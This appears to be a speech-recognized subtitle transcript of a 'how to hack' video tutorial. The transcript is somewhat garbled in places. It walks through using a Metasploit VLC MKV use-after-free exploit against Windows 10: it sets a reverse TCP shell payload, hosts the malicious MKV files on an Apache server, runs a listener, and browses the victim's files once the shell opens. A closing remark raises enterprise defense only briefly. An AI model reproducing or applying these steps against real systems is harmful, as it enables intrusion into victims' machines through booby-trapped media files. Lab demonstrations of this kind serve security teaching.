Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:00,030 --> 00:00:02,100 hi and welcome back to another episode 2 00:00:02,100 --> 00:00:04,680 on how to hack cell today we're gonna 3 00:00:04,680 --> 00:00:07,259 discuss about using executable against 4 00:00:07,259 --> 00:00:09,030 the practical application in this case 5 00:00:09,030 --> 00:00:12,840 to be specific it's on VLC so there are 6 00:00:12,840 --> 00:00:15,809 many common bar ability exposure that 7 00:00:15,809 --> 00:00:18,990 allow us to actually take advantage of 8 00:00:18,990 --> 00:00:21,420 those executables launching into an 9 00:00:21,420 --> 00:00:23,580 application for example on an operating 10 00:00:23,580 --> 00:00:26,189 system and for today's tutorial we are 11 00:00:26,189 --> 00:00:29,099 going to target Windows 10 and once you 12 00:00:29,099 --> 00:00:30,830 have the user clicking under the foul 13 00:00:30,830 --> 00:00:33,870 executing it on VLC and then you have 14 00:00:33,870 --> 00:00:35,719 the operating system on Windows 10 15 00:00:35,719 --> 00:00:38,430 immediately to begin shell to Cal Linux 16 00:00:38,430 --> 00:00:40,140 and you can do a lot more things from 17 00:00:40,140 --> 00:00:42,420 there you are able to launch different 18 00:00:42,420 --> 00:00:44,760 kind of attacks you are able to look for 19 00:00:44,760 --> 00:00:46,440 sensitive data download those 20 00:00:46,440 --> 00:00:48,809 information upload into an existing 21 00:00:48,809 --> 00:00:51,210 server as well and many other different 22 00:00:51,210 --> 00:00:53,129 things once you have access into its 23 00:00:53,129 --> 00:00:55,649 shell so without further ado let us kick 24 00:00:55,649 --> 00:00:58,879 start on today's tutorial 25 00:00:59,789 --> 00:01:02,250 so on a write on the screen I have kala 26 00:01:02,250 --> 00:01:04,559 Linux running and on the Left Sun screen 27 00:01:04,559 --> 00:01:07,560 I have a Windows 10 64 bit running so 28 00:01:07,560 --> 00:01:09,659 like I mentioned earlier today's 29 00:01:09,659 --> 00:01:12,149 tutorial is to target Windows 10 machine 30 00:01:12,149 --> 00:01:15,750 which has a VLC media player so we're 31 00:01:15,750 --> 00:01:17,820 gonna go ahead and launch a terminal on 32 00:01:17,820 --> 00:01:20,610 Kali Linux solve here we can zoom in a 33 00:01:20,610 --> 00:01:22,110 little make the font size a little 34 00:01:22,110 --> 00:01:25,200 bigger so you can see it clearly and we 35 00:01:25,200 --> 00:01:27,149 can go in and enter ifconfig so that we 36 00:01:27,149 --> 00:01:29,280 know the IP address of the attacking 37 00:01:29,280 --> 00:01:31,619 machine so in this case we have the 38 00:01:31,619 --> 00:01:33,270 attacking machine running on the IP 39 00:01:33,270 --> 00:01:37,770 address of 1 I 2 1 6 8 1 1 0 so we can 40 00:01:37,770 --> 00:01:40,170 go ahead and launch MSF console so that 41 00:01:40,170 --> 00:01:43,110 we can find out where is the exploit and 42 00:01:43,110 --> 00:01:45,630 how can we exploit it fully into the 43 00:01:45,630 --> 00:01:48,179 target machine so once you're launching 44 00:01:48,179 --> 00:01:50,819 MSF console while we're doing that and 45 00:01:50,819 --> 00:01:52,200 we're starting up the Metasploit 46 00:01:52,200 --> 00:01:53,459 framework console 47 00:01:53,459 --> 00:01:56,789 let's open up Internet Explorer so on 48 00:01:56,789 --> 00:01:58,049 the Internet Explorer we're gonna 49 00:01:58,049 --> 00:02:00,659 download a file later on so here you can 50 00:02:00,659 --> 00:02:03,509 search for VLC so we can look at all the 51 00:02:03,509 --> 00:02:05,700 vulnerabilities that is associated with 52 00:02:05,700 --> 00:02:08,878 VLC software so in this case we are 53 00:02:08,878 --> 00:02:10,709 going to use number tree which is a 54 00:02:10,709 --> 00:02:14,129 exploit windows file format MKV so it's 55 00:02:14,129 --> 00:02:17,459 a MKV use after freeze and what we can 56 00:02:17,459 --> 00:02:20,430 do right now is that we have X we have 57 00:02:20,430 --> 00:02:23,099 identified the exploit we will be using 58 00:02:23,099 --> 00:02:26,629 so we can go ahead and enter use exploit 59 00:02:26,629 --> 00:02:32,010 Windows file format VLC mkb so this is 60 00:02:32,010 --> 00:02:35,340 exactly the naming that we have over 61 00:02:35,340 --> 00:02:38,340 here in order to utilize the exploit so 62 00:02:38,340 --> 00:02:40,050 we can enter show options to see what 63 00:02:40,050 --> 00:02:41,640 are the parameters that we have to 64 00:02:41,640 --> 00:02:44,909 access into so we can set the alehouse 65 00:02:44,909 --> 00:02:47,099 which is the attacking machine as 1 I 2 66 00:02:47,099 --> 00:02:50,819 1 6 8 . 1.10 so once you've done that 67 00:02:50,819 --> 00:02:53,459 you can again do a double check to see 68 00:02:53,459 --> 00:02:55,650 whether you go to Al host right whether 69 00:02:55,650 --> 00:02:57,750 you go to L port right so do take note 70 00:02:57,750 --> 00:03:00,900 of these two items and one more thing I 71 00:03:00,900 --> 00:03:02,730 wanted to really pay attention to is the 72 00:03:02,730 --> 00:03:04,890 payload option so in this case you'll be 73 00:03:04,890 --> 00:03:08,670 using a Windows x64 shell reverse TCP so 74 00:03:08,670 --> 00:03:10,590 that will give us a reverse connection 75 00:03:10,590 --> 00:03:11,680 back into the windows 76 00:03:11,680 --> 00:03:14,680 machine so essentially allowing us to 77 00:03:14,680 --> 00:03:16,870 bypass any standard windows firewall in 78 00:03:16,870 --> 00:03:19,989 the environment so moving forward what 79 00:03:19,989 --> 00:03:22,060 we can do is we can actually go ahead 80 00:03:22,060 --> 00:03:25,000 and exploit to generate default so once 81 00:03:25,000 --> 00:03:26,500 you hit exploit it would actually 82 00:03:26,500 --> 00:03:28,090 generate the file over here 83 00:03:28,090 --> 00:03:30,760 so what we can see is we have the files 84 00:03:30,760 --> 00:03:34,389 stored on route MSF for local followed 85 00:03:34,389 --> 00:03:37,299 by part 1 and part 2 so we're gonna go 86 00:03:37,299 --> 00:03:39,340 ahead and open the novel terminal and 87 00:03:39,340 --> 00:03:42,189 then likewise we are going to go 88 00:03:42,189 --> 00:03:44,379 directly into the folder so we go to 89 00:03:44,379 --> 00:03:49,299 route dot MSF dot EMS 4 and then we can 90 00:03:49,299 --> 00:03:51,639 do LS we can go to the local again and 91 00:03:51,639 --> 00:03:54,129 then we do LS and we can see all the 92 00:03:54,129 --> 00:03:56,680 files that we have generated so in my 93 00:03:56,680 --> 00:03:58,359 case I've generated a number of files 94 00:03:58,359 --> 00:04:01,120 again it could be KB and and of course 95 00:04:01,120 --> 00:04:03,669 we're gonna showcase on uwt as well and 96 00:04:03,669 --> 00:04:06,219 we can do LS dash L you realize that the 97 00:04:06,219 --> 00:04:08,590 pot one-fall is significantly larger 98 00:04:08,590 --> 00:04:11,560 than the pot to fall and if we see over 99 00:04:11,560 --> 00:04:13,030 here we actually have more than a 100 00:04:13,030 --> 00:04:15,069 gigabyte of file size so you've gotta 101 00:04:15,069 --> 00:04:17,680 take awhile for you or for the victim 102 00:04:17,680 --> 00:04:20,108 machine to download those files so it's 103 00:04:20,108 --> 00:04:21,459 really important that you could use some 104 00:04:21,459 --> 00:04:23,860 kind of compression technology so you 105 00:04:23,860 --> 00:04:25,870 could copy those false so into a web 106 00:04:25,870 --> 00:04:28,060 server and host it over there so what 107 00:04:28,060 --> 00:04:30,250 i've done is i've actually copied the 108 00:04:30,250 --> 00:04:31,990 very initial file that i generated 109 00:04:31,990 --> 00:04:36,760 earlier so once we go into the VAR WCML 110 00:04:36,760 --> 00:04:39,370 we can do LS dash L so here we can see 111 00:04:39,370 --> 00:04:41,259 we have two false that are available 112 00:04:41,259 --> 00:04:43,870 that we have generated earlier and once 113 00:04:43,870 --> 00:04:46,150 you have that you can actually check 114 00:04:46,150 --> 00:04:49,180 your Apache server status so here we can 115 00:04:49,180 --> 00:04:51,340 see then we have the server it's 116 00:04:51,340 --> 00:04:53,650 disabled and of course we want to check 117 00:04:53,650 --> 00:04:56,280 some configurations before we actually 118 00:04:56,280 --> 00:05:00,009 initiate the Apache server so what you 119 00:05:00,009 --> 00:05:02,199 can do is you can actually do a cat etc' 120 00:05:02,199 --> 00:05:04,690 followed by Apache 2 followed by pasar 121 00:05:04,690 --> 00:05:07,270 configuration so here we see that we 122 00:05:07,270 --> 00:05:09,909 have the webserver listening on 8001 123 00:05:09,909 --> 00:05:11,650 so once we have the necessary 124 00:05:11,650 --> 00:05:13,900 information we can go ahead and start 125 00:05:13,900 --> 00:05:17,229 the service so service Apache - followed 126 00:05:17,229 --> 00:05:18,820 by start so this will start up the 127 00:05:18,820 --> 00:05:21,099 Apache web server and once you have it 128 00:05:21,099 --> 00:05:22,779 running you want to do a double check to 129 00:05:22,779 --> 00:05:24,460 make sure that you have the web service 130 00:05:24,460 --> 00:05:24,870 running 131 00:05:24,870 --> 00:05:27,120 so here we see that the server is 132 00:05:27,120 --> 00:05:29,010 running and we are hosting those false 133 00:05:29,010 --> 00:05:31,940 so what we can do is we can go back into 134 00:05:31,940 --> 00:05:35,340 the Metasploit and look at different 135 00:05:35,340 --> 00:05:37,650 ways for us to stop the listener so what 136 00:05:37,650 --> 00:05:39,780 you can do is go ahead and enter exploit 137 00:05:39,780 --> 00:05:42,990 multi handler so this would start the 138 00:05:42,990 --> 00:05:44,790 multi handler and then we have the set 139 00:05:44,790 --> 00:05:46,860 of payload so remember the payload then 140 00:05:46,860 --> 00:05:48,780 we were discussing about that we have to 141 00:05:48,780 --> 00:05:52,320 take note it's a Windows x64 followed by 142 00:05:52,320 --> 00:05:55,710 shell followed by reverse TCP so once we 143 00:05:55,710 --> 00:05:57,240 have said that we got to look at the 144 00:05:57,240 --> 00:06:00,419 options so we click show options so in 145 00:06:00,419 --> 00:06:01,889 this case we have to fill in the elf 146 00:06:01,889 --> 00:06:03,870 host and we already have the L pot 147 00:06:03,870 --> 00:06:06,120 specified which is the exact same as the 148 00:06:06,120 --> 00:06:09,450 payload that we made earlier so go ahead 149 00:06:09,450 --> 00:06:11,340 and enter the L holes of one eighty to 150 00:06:11,340 --> 00:06:14,669 one sixty eight dot one dot one zero so 151 00:06:14,669 --> 00:06:16,320 this is the attacking machine which is 152 00:06:16,320 --> 00:06:19,620 the IP address of the Kali Linux so now 153 00:06:19,620 --> 00:06:21,690 with this in mind we can go ahead and 154 00:06:21,690 --> 00:06:23,220 enter exploit so that we have our 155 00:06:23,220 --> 00:06:25,770 listener so we have the reverse TCP 156 00:06:25,770 --> 00:06:28,139 Handler running right now on port four 157 00:06:28,139 --> 00:06:30,930 four four four so we can go ahead and go 158 00:06:30,930 --> 00:06:33,570 into the Windows 10 operating system and 159 00:06:33,570 --> 00:06:36,990 you can go to 192 168 1 or 1 0 followed 160 00:06:36,990 --> 00:06:40,320 by the port of 8001 so over here you can 161 00:06:40,320 --> 00:06:42,570 go to the eww teapot one it so it's part 162 00:06:42,570 --> 00:06:44,610 two you can compress them into a single 163 00:06:44,610 --> 00:06:46,139 file and then from there on 164 00:06:46,139 --> 00:06:48,450 once it is uncompressed the user can 165 00:06:48,450 --> 00:06:50,490 access it and immediately will see all 166 00:06:50,490 --> 00:06:53,310 those details so moving forward we can 167 00:06:53,310 --> 00:06:55,440 actually go into dolls page we can open 168 00:06:55,440 --> 00:06:58,440 up the folder so I already have the file 169 00:06:58,440 --> 00:07:01,139 downloaded so it just it will take a 170 00:07:01,139 --> 00:07:02,400 while for the file to download 171 00:07:02,400 --> 00:07:04,979 completely into the target machine and 172 00:07:04,979 --> 00:07:06,900 once you have the file the user will 173 00:07:06,900 --> 00:07:10,860 open it with a VLC media player so once 174 00:07:10,860 --> 00:07:12,599 you click that no I'm not gonna send a 175 00:07:12,599 --> 00:07:15,900 report so we can open up the fall we see 176 00:07:15,900 --> 00:07:18,510 we have the eww teapot 1 MK be running 177 00:07:18,510 --> 00:07:21,479 so in this case if you see on the right 178 00:07:21,479 --> 00:07:23,700 side we actually have two bytes and over 179 00:07:23,700 --> 00:07:26,070 sending the stage come on she'll open 180 00:07:26,070 --> 00:07:29,340 and over here we have a shell directly 181 00:07:29,340 --> 00:07:31,590 into the system so you reenter for 182 00:07:31,590 --> 00:07:34,349 example a simple command like dir we 183 00:07:34,349 --> 00:07:36,200 would see all of the files available 184 00:07:36,200 --> 00:07:38,470 within the system so 185 00:07:38,470 --> 00:07:40,630 we can see the dot dot city dot dot and 186 00:07:40,630 --> 00:07:43,690 then we can go into of course the 187 00:07:43,690 --> 00:07:46,300 desktop which is a neighbor that we are 188 00:07:46,300 --> 00:07:49,060 really interested in so if I do a dir we 189 00:07:49,060 --> 00:07:51,460 can see there in two users to do a dir 190 00:07:51,460 --> 00:07:53,710 again we can see the into the user which 191 00:07:53,710 --> 00:07:56,140 is the current user on the desktop right 192 00:07:56,140 --> 00:07:58,810 now so if I was to minimize everything 193 00:07:58,810 --> 00:08:01,750 so here we have the desktop running and 194 00:08:01,750 --> 00:08:04,240 then we can do a dir and then this time 195 00:08:04,240 --> 00:08:06,850 around we go to go access into the 196 00:08:06,850 --> 00:08:08,680 desktop and then we're gonna go further 197 00:08:08,680 --> 00:08:11,500 into our attack attempt so over here 198 00:08:11,500 --> 00:08:13,030 we're really gain access into the 199 00:08:13,030 --> 00:08:15,370 environment and what we can do is we can 200 00:08:15,370 --> 00:08:18,190 actually very quickly deal with echo you 201 00:08:18,190 --> 00:08:21,520 have been hacked and then followed by 202 00:08:21,520 --> 00:08:23,620 this and then we will pump it out into a 203 00:08:23,620 --> 00:08:27,010 file called hat dot txt so once you do 204 00:08:27,010 --> 00:08:29,650 that on the left side on the left side 205 00:08:29,650 --> 00:08:31,690 screen you can see that we have a hacked 206 00:08:31,690 --> 00:08:35,440 ext available already created because of 207 00:08:35,440 --> 00:08:37,299 the command coming from the right side 208 00:08:37,299 --> 00:08:40,840 so if you enter hang txt this would open 209 00:08:40,840 --> 00:08:42,760 up the file and then we realize that the 210 00:08:42,760 --> 00:08:44,650 system has been completely compromised 211 00:08:44,650 --> 00:08:47,410 and from here we recognize that we have 212 00:08:47,410 --> 00:08:50,410 already been hacked so there you're 213 00:08:50,410 --> 00:08:52,060 saying it how quickly we could actually 214 00:08:52,060 --> 00:08:54,370 gain access in the system once the user 215 00:08:54,370 --> 00:08:56,830 downloads file executed file will be 216 00:08:56,830 --> 00:08:58,720 able to gain direct access into the 217 00:08:58,720 --> 00:09:01,240 system to a vulnerability within the 218 00:09:01,240 --> 00:09:03,070 application and in this case the 219 00:09:03,070 --> 00:09:04,960 tutorial was on Windows 10 running on a 220 00:09:04,960 --> 00:09:08,710 VLC application so likewise that you 221 00:09:08,710 --> 00:09:10,240 have seen from many other different 222 00:09:10,240 --> 00:09:12,730 tutorials it could be from Mac or Excel 223 00:09:12,730 --> 00:09:14,530 that I mentioned earlier or from PDF 224 00:09:14,530 --> 00:09:17,650 files the attack vectors are plenty and 225 00:09:17,650 --> 00:09:18,760 there many different ways for you to 226 00:09:18,760 --> 00:09:20,710 hijack the system including phishing 227 00:09:20,710 --> 00:09:23,350 email so there are really many many ways 228 00:09:23,350 --> 00:09:25,180 of you gaining access in the enterprise 229 00:09:25,180 --> 00:09:27,400 so the next question I have for you for 230 00:09:27,400 --> 00:09:29,020 you to think back after today's tutorial 231 00:09:29,020 --> 00:09:31,870 is what can you do as an enterprise to 232 00:09:31,870 --> 00:09:33,670 defend against those different kind of 233 00:09:33,670 --> 00:09:35,470 cyber threats if it's a phishing email 234 00:09:35,470 --> 00:09:37,390 it's a compromise directly into your 235 00:09:37,390 --> 00:09:39,010 service it's a compromise on your 236 00:09:39,010 --> 00:09:41,110 end-user machines which may have 237 00:09:41,110 --> 00:09:43,510 critical data residing there as well so 238 00:09:43,510 --> 00:09:44,890 with so many different kind of attack 239 00:09:44,890 --> 00:09:47,920 vectors how do you build a layered 240 00:09:47,920 --> 00:09:50,110 defense against many of this different 241 00:09:50,110 --> 00:09:52,030 potential areas for 242 00:09:52,030 --> 00:09:53,830 potential risk that could come into your 243 00:09:53,830 --> 00:09:56,230 critical data so there is something for 244 00:09:56,230 --> 00:09:57,730 your thing about and I hope you learned 245 00:09:57,730 --> 00:09:59,800 something valuable today and today's 246 00:09:59,800 --> 00:10:01,690 tutorial and if you like what you've 247 00:10:01,690 --> 00:10:03,250 just watched feel free to subscribe and 248 00:10:03,250 --> 00:10:05,440 leave a comment below so that I can do 249 00:10:05,440 --> 00:10:07,930 whatever I could to respond to any of 250 00:10:07,930 --> 00:10:09,580 your questions and thank you so much for 251 00:10:09,580 --> 00:10:12,150 watching again 18192